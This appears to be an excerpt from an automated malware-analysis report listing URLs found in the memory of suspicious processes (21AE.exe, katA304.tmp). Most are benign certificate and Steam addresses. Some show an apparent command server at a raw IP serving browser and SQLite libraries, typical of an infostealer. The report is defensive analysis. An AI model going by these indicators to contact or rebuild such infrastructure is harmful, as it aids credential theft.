                  Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: explorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000000.2638757947.00000000004B4000.00000002.00000001.01000000.00000009.sdmp, katA304.tmp.12.drString found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
                  Source: explorer.exe, 00000002.00000000.2039593214.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2038682959.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2039552832.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: katA304.tmp, katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135734102.000000001DE0D000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: 76561199689717899[1].htm.13.drString found in binary or memory: https://65.109.242.59
                  Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/
                  Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/#
                  Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/.
                  Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/8
                  Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/H
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866839483.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dll
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/g
                  Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/k
                  Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/l
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dll
                  Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dllao
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dllk~c
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/msvcp140.dll
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/msvcp140.dllC~
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dll
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dll7
                  Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/r
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/softokn3.dll
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sqls.dll
                  Source: katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sqls.dllYVj
                  Source: katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/vcruntime140.dll
                  Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.5908b543ef9ant-Disposition:
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59;
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59ECAE
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59JKFI
                  Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59KKEH
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59a
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: explorer.exe, 00000002.00000000.2042302155.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                  Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 00000002.00000000.2037994793.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: explorer.exe, 00000002.00000000.2037244792.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                  Source: 76561199689717899[1].htm.13.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.clo
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
